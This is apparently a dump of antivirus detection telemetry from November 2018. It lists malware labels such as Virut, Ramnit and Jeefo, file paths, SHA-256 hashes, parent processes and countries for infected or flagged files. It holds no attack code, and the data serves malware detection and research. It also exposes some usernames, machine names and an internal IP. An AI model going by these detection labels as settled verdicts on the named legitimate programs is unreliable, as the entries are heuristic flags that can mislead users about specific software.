  Row(detection=Row(filename='keygen.exe', filepath='/Volumes/My Passport Pro/Samart/DATA1_iMAC/Documents/Samart/WasuwatP/IT_Support/SSW/Ake_Service/Resource/Driver Genius Pro v8.0.0.316/Lang.rus Key/keygen/keygen.exe', filesize=128000, name='HEUR/AGEN.1028107.#M15.#R1028107'), hash='d3fc50040071f41f3e5754c1745ac786b7ebb78b83e9ed08642630666e86cee4', metadata=Row(cmdline=None, country='TH', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:05:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='keygen[1].exe', filepath='/Volumes/My Passport Pro/Samart/DATA1_iMAC/Documents/Samart/WasuwatP/IT_Support/BRC/Driver Genius Pro v8.0.0.316/Lang.rus Key/keygen/ardv_suspicious_file(s)/keygen[1].exe', filesize=128000, name='HEUR/AGEN.1028107.#M15.#R1028107'), hash='d3fc50040071f41f3e5754c1745ac786b7ebb78b83e9ed08642630666e86cee4', metadata=Row(cmdline=None, country='TH', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T17:59:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp5xxvzlvq', filepath='/tmp/tmp5xxvzlvq', filesize=192000, name='TR/Downloader.Gen.#M2.#R5133'), hash='d4372429f4e1fd933b72425478d94dc930103a965123cb062c4391b2be4431a3', metadata=Row(cmdline=None, country='IE', os_name='Linux', os_vmajor='8', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T04:06:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='gacutil.exe', filepath='C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\v8.0A\\bin\\NETFX 4.0 Tools\\x64\\gacutil.exe', filesize=172000, name='W32/Neshta.A.#M1.#R1'), hash='d46cde95733160114a1ce30d868d69b5d4e714fd9b9b0910ab8d141865c23f4f', metadata=Row(cmdline='-m:GeneralTel.dll -f:RunGeneralTelemetry  -cV 7s2Ufj7IgU2HVgcw.1.2 -SendFullTelemetry -ThrottleUtc', country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T11:14:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='gacutil.exe', filepath='C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\v8.0A\\bin\\NETFX 4.0 Tools\\x64\\gacutil.exe', filesize=172000, name='W32/Neshta.A.#M1.#R1'), hash='d46cde95733160114a1ce30d868d69b5d4e714fd9b9b0910ab8d141865c23f4f', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:7s2Ufj7IgU2HVgcw.1', country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T11:14:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='the lean startup. eric riec_.exe', filepath='G:\\\xa0\\VET\\The Lean Startup. ERIC RIEC_.exe', filesize=3712000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='d4f814c329840441a026338f34f3ea7247fa21c295afc956920a26d89cad6947', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-04T09:18:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-162134-63ff38ff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7bce52ab\\AVSCAN-20181104-161950-575F36AB\\AVSCAN-20181104-162134-63FF38FF', filesize=3712000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='d4f814c329840441a026338f34f3ea7247fa21c295afc956920a26d89cad6947', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:22:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rcisdrjd.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\fhewwsif\\rcisdrjd.exe', filesize=584000, name='TR/Dropper.VB.d50e31.#M1.#R1'), hash='d50e31534edead41ed9449f6c89feddb29fc729ec79f8275d84501190efc0859', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:00:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-230031-2f2286c8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-230013-2BC8EFBA\\AVSCAN-20181104-230031-2F2286C8', filesize=584000, name='TR/Dropper.VB.d50e31.#M1.#R1'), hash='d50e31534edead41ed9449f6c89feddb29fc729ec79f8275d84501190efc0859', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:00:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wscript.exe', filepath='\\\\?\\C:\\WINXP\\system32\\wscript.exe', filesize=192000, name='W32/Jeefo.A.#M1.#R1'), hash='d54555f1012004327a4b511863c815878e9463bbaf7073626f8dae4b706a7f1f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:28:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mck.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\mck.exe', filesize=128000, name='HEUR/AGEN.1008916.#M1.#R1'), hash='d586d3d2f871ae3f9a246c72b4f792932468b4fb9e1d52f4e1b2b2ef708058b8', metadata=Row(cmdline='\\\\\\/DB', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\IObit\\Driver Booster\\6.0.2\\MlwScan.exe', parentsize=690960, timestamp='2018-11-04T07:46:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-102140-6e954efd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7c12c1b6\\AVSCAN-20181104-102108-6B0E1B75\\AVSCAN-20181104-102140-6E954EFD', filesize=128000, name='HEUR/AGEN.1008916.#M1.#R1'), hash='d586d3d2f871ae3f9a246c72b4f792932468b4fb9e1d52f4e1b2b2ef708058b8', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:21:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='bnsxcda2.exe', filepath='c:\\users\\X\\appdata\\local\\ef432080-1430173224-1452-bff1-a7a2cfeff041\\bnsxcda2.exe', filesize=192000, name='APPL/RedCap.d6a4f9.#M1.#R1'), hash='d6a4f91036b4cad586ba56cf847f8851a2ce6b3ff9ca5babf4c3c1a761367e4b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\SysWOW64\\runonce.exe', parentsize=47616, timestamp='2018-11-04T23:30:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='d6cc5901d78fdea9c07227028201572439ebf90a135aa85e0abe6b9dd710945f', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:46:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='d70bf18515370c41bdfcfa24b1fd553557f713b45b4233051fbfebf3fb2964a2', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\D70BF18515370C41BDFCFA24B1FD553557F713B45B4233051FBFEBF3FB2964A2', filesize=148000, name='TR/Crypt.ZPACK.Gen7.#M300.#R600521'), hash='d70bf18515370c41bdfcfa24b1fd553557f713b45b4233051fbfebf3fb2964a2', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:51:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='skypebrowserhost.exe', filepath='C:\\Program Files\\Skype\\Browser\\SkypeBrowserHost.exe', filesize=316000, name='W32/Jeefo.A.#M1.#R1'), hash='d71e41ff47dfee3dae7e2ad033dc2f83ebf992acf4d0c5ca531c84e6c84b1f5d', metadata=Row(cmdline='\\\\\\/apps \\\\\\/appinv \\\\\\"C:\\\\\\\\Windows\\\\\\\\TEMP\\\\\\\\CompatTelemetryLogs\\\\\\\\WICA_Programs_HOSSEIN-PC.xml\\\\\\" \\\\\\/devinv \\\\\\"C:\\\\\\\\Windows\\\\\\\\TEMP\\\\\\\\CompatTelemetryLogs\\\\\\\\WICA_Devices_HOSSEIN-PC.xml\\\\\\" \\\\\\/out \\\\\\"C:\\\\\\\\Windows\\\\\\\\TEMP\\\\\\\\CompatTelemetryLogs\\\\\\\\...\\\\CompatTel\\\\\\\\sysmain32.sdb\\\\\\" \\\\\\/log \\\\\\"C:\\\\\\\\Windows\\\\\\\\TEMP\\\\\\\\CompatTelemetryLogs\\\\\\" \\\\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\CompatTel\\\\\\" \\\\\\/REDUCED \\\\\\/runtimeAppSdb \\\\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\CompatTel\\\\\\\\sysmain32Runtime.sdb\\\\\\"', country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTel\\QueryAppBlock.exe', parentsize=138912, timestamp='2018-11-04T08:41:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='skypebrowserhost.exe', filepath='C:\\Program Files\\Skype\\Browser\\SkypeBrowserHost.exe', filesize=316000, name='W32/Jeefo.A.#M1.#R1'), hash='d71e41ff47dfee3dae7e2ad033dc2f83ebf992acf4d0c5ca531c84e6c84b1f5d', metadata=Row(cmdline='\\\\\\/V', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\msiexec.exe', parentsize=73216, timestamp='2018-11-04T15:06:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='skypebrowserhost.exe', filepath='C:\\Program Files (x86)\\Skype\\Browser\\SkypeBrowserHost.exe', filesize=316000, name='W32/Jeefo.A.#M1.#R1'), hash='d71e41ff47dfee3dae7e2ad033dc2f83ebf992acf4d0c5ca531c84e6c84b1f5d', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:C7SauQ2RaUSQisjm.1', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T02:50:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='jewelquest.exe', filepath='C:\\Program Files\\GameHouse\\JewelQuest\\JewelQuest.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='d7388e48476a747697edc7a875d41f0df0e39033a44e40a82904e4aca8aeabb6', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-04T02:23:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='launcher.dll', filepath='D:\\GAMES\\ONLINE GAMES\\steam\\steamapps\\common\\Counter-Strike Global Offensive\\bin\\launcher.dll', filesize=256000, name='W32/Ramnit.CD.#M1.#R1'), hash='d75f93ad74999547e17e1e0b3c0880499d036a29d5314a17b21159f32bd53618', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T11:28:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='launcher.dll', filepath='\\\\?\\D:\\GAMES\\ONLINE GAMES\\steam\\steamapps\\common\\Counter-Strike Global Offensive\\bin\\launcher.dll', filesize=256000, name='W32/Ramnit.CD.#M1.#R1'), hash='d75f93ad74999547e17e1e0b3c0880499d036a29d5314a17b21159f32bd53618', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:34:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cardrecovery.exe', filepath='\\\\10.255.111.86\\d$\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\CardRecovery.exe', filesize=64000, name='BDS/Rogue.766012.#M1.#R1'), hash='d809a1cf78a0751b6980abcbb83f400d51e369658aefe4ec3acc97bf43fd79af', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T06:22:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215736-81cdc16c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77e93ea4\\AVSCAN-20181104-214501-F9E185C1\\AVSCAN-20181104-215736-81CDC16C', filesize=64000, name='BDS/Rogue.766012.#M1.#R1'), hash='d809a1cf78a0751b6980abcbb83f400d51e369658aefe4ec3acc97bf43fd79af', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:57:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cfp.exe', filepath='C:\\Users\\X\\Downloads\\Miracle_Box_2.27A_Full_Version-By-firmwareguide\\TOOLS\\Blackberry\\cfp\\cfp.exe', filesize=15104000, name='W32/Ramnit.CD.#M1.#R1'), hash='d8778742e840c3fc333cb563e974225c9bbcc9f2a70060c887c5770e0468d346', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\baidu\\Baidu Browser\\spark.exe', parentsize=983056, timestamp='2018-11-04T12:06:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='d89af1ce2554b8c08a71cd125191f07a07ee07f6659a32f1a6f6dcf27b3ad0f7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\D89AF1CE2554B8C08A71CD125191F07A07EE07F6659A32F1A6F6DCF27B3AD0F7', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d89af1ce2554b8c08a71cd125191f07a07ee07f6659a32f1a6f6dcf27b3ad0f7', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:56:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='d8bd68c7815d2ae8dd798b2e768f67b3488a566aa997eb176b4dbde96cadd1cd', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-04T22:36:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='d8dcde5e9ceff8ad5b7494fbb855d3f1673ba1622b23dc62ad3eb555029c5709', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\D8DCDE5E9CEFF8AD5B7494FBB855D3F1673BA1622B23DC62AD3EB555029C5709', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d8dcde5e9ceff8ad5b7494fbb855d3f1673ba1622b23dc62ad3eb555029c5709', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:57:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-115136-31a6b8f3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b237c868\\AVSCAN-20181104-114819-1D269D51\\AVSCAN-20181104-115136-31A6B8F3', filesize=64000, name='TR/Rogue.7547256.#M1.#R1'), hash='d8f3b8709ebc205cb05e8cb0bfb9c041b8eebd0e2825b6b71d1d265f77117514', metadata=Row(cmdline=None, country='RE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T07:51:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-120956-a4a8e38f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b237c868\\AVSCAN-20181104-114819-1D269D51\\AVSCAN-20181104-120956-A4A8E38F', filesize=64000, name='TR/Rogue.7547256.#M1.#R1'), hash='d8f3b8709ebc205cb05e8cb0bfb9c041b8eebd0e2825b6b71d1d265f77117514', metadata=Row(cmdline=None, country='RE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T08:09:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-112026-c0bcd1f0', filepath='C:\\Documents and Settings\\X\\Dati applicazioni\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-112006-5AE32748\\AVSCAN-20181104-112026-C0BCD1F0', filesize=64000, name='TR/Rogue.7547256.#M1.#R1'), hash='d8f3b8709ebc205cb05e8cb0bfb9c041b8eebd0e2825b6b71d1d265f77117514', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:20:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='keygen.exe', filepath='F:\\Program Files\\REAPER\\Keygen.exe', filesize=64000, name='TR/Rogue.7547256.#M1.#R1'), hash='d8f3b8709ebc205cb05e8cb0bfb9c041b8eebd0e2825b6b71d1d265f77117514', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:19:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='d91f930ab16122533e4b3af12556296ce2ee17585d0261932587be8ea6613ab4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\D91F930AB16122533E4B3AF12556296CE2EE17585D0261932587BE8EA6613AB4', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d91f930ab16122533e4b3af12556296ce2ee17585d0261932587be8ea6613ab4', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:58:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-165626-077b8ae8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d7c3c43c\\AVSCAN-20181104-165601-026E64FE\\AVSCAN-20181104-165626-077B8AE8', filesize=8852000, name='PUA/FusionCore.P.#M1.#R1'), hash='d93fd89aa6de8363b364f522c38b171dc2a1d1525b7dd0d2c35fab0428c38255', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:56:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-111052-a6c7e583', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-111044-A61821D0\\AVSCAN-20181104-111052-A6C7E583', filesize=8852000, name='PUA/FusionCore.P.#M1.#R1'), hash='d93fd89aa6de8363b364f522c38b171dc2a1d1525b7dd0d2c35fab0428c38255', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T10:10:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-111101-a7adc10b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-111044-A61821D0\\AVSCAN-20181104-111101-A7ADC10B', filesize=8852000, name='PUA/FusionCore.P.#M1.#R1'), hash='d93fd89aa6de8363b364f522c38b171dc2a1d1525b7dd0d2c35fab0428c38255', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T10:10:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-111057-a7402b34', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-111044-A61821D0\\AVSCAN-20181104-111057-A7402B34', filesize=8852000, name='PUA/FusionCore.P.#M1.#R1'), hash='d93fd89aa6de8363b364f522c38b171dc2a1d1525b7dd0d2c35fab0428c38255', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T10:10:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-111037-a560da97', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cdc3d38d\\AVSCAN-20181104-110901-9C74035A\\AVSCAN-20181104-111037-A560DA97', filesize=8852000, name='PUA/FusionCore.P.#M1.#R1'), hash='d93fd89aa6de8363b364f522c38b171dc2a1d1525b7dd0d2c35fab0428c38255', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T10:10:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='filezilla_3.29.0_win64-setup_bundled.exe', filepath='c:\\users\\X\\downloads\\filezilla_3.29.0_win64-setup_bundled.exe', filesize=8852000, name='PUA/FusionCore.P.#M1.#R1'), hash='d93fd89aa6de8363b364f522c38b171dc2a1d1525b7dd0d2c35fab0428c38255', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T15:55:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='filezilla_3.29.0_win64-setup_bundled (2017_11_08 21_15_05 utc).exe', filepath='\\\\?\\D:\\ServerFolders\\File History Backups\\Admin03\\Admin03@MCCOYOFFICE.local\\DESKTOP-GQ6NIDG\\Data\\C\\Users\\admin03.MCCOYOFFICE\\Downloads\\FileZilla_3.29.0_win64-setup_bundled (2017_11_08 21_15_05 UTC).exe', filesize=8852000, name='PUA/FusionCore.P.#M1.#R1'), hash='d93fd89aa6de8363b364f522c38b171dc2a1d1525b7dd0d2c35fab0428c38255', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T06:49:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-111110-a87b3977', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cdc3d38d\\AVSCAN-20181104-110901-9C74035A\\AVSCAN-20181104-111110-A87B3977', filesize=8852000, name='PUA/FusionCore.P.#M1.#R1'), hash='d93fd89aa6de8363b364f522c38b171dc2a1d1525b7dd0d2c35fab0428c38255', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T10:11:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-111130-aa5c8723', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cdc3d38d\\AVSCAN-20181104-110901-9C74035A\\AVSCAN-20181104-111130-AA5C8723', filesize=8852000, name='PUA/FusionCore.P.#M1.#R1'), hash='d93fd89aa6de8363b364f522c38b171dc2a1d1525b7dd0d2c35fab0428c38255', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T10:11:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='d957b4ff0646abd39096b7b3b7f7431ca47fc4e84421eb2e8664afee59485aa7', metadata=Row(cmdline='\\\\\\/Embedding', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T23:58:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='d957b4ff0646abd39096b7b3b7f7431ca47fc4e84421eb2e8664afee59485aa7', metadata=Row(cmdline='\\\\\\/Embedding', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T23:58:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='d957b4ff0646abd39096b7b3b7f7431ca47fc4e84421eb2e8664afee59485aa7', metadata=Row(cmdline='\\\\\\/Embedding', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T23:58:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='d957b4ff0646abd39096b7b3b7f7431ca47fc4e84421eb2e8664afee59485aa7', metadata=Row(cmdline='\\\\\\/Embedding', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T23:58:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='d957b4ff0646abd39096b7b3b7f7431ca47fc4e84421eb2e8664afee59485aa7', metadata=Row(cmdline='\\\\\\/Embedding', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T23:58:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='d957b4ff0646abd39096b7b3b7f7431ca47fc4e84421eb2e8664afee59485aa7', metadata=Row(cmdline='\\\\\\/Embedding', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T23:58:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='d9952fadc5c646678a30a6b3c3afee30a38890a7c80f1e5dede1cf834b605991', metadata=Row(cmdline='\\\\\\/Embedding', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-04T14:47:09Z'), dt=datetime.date(2018, 11, 4)),
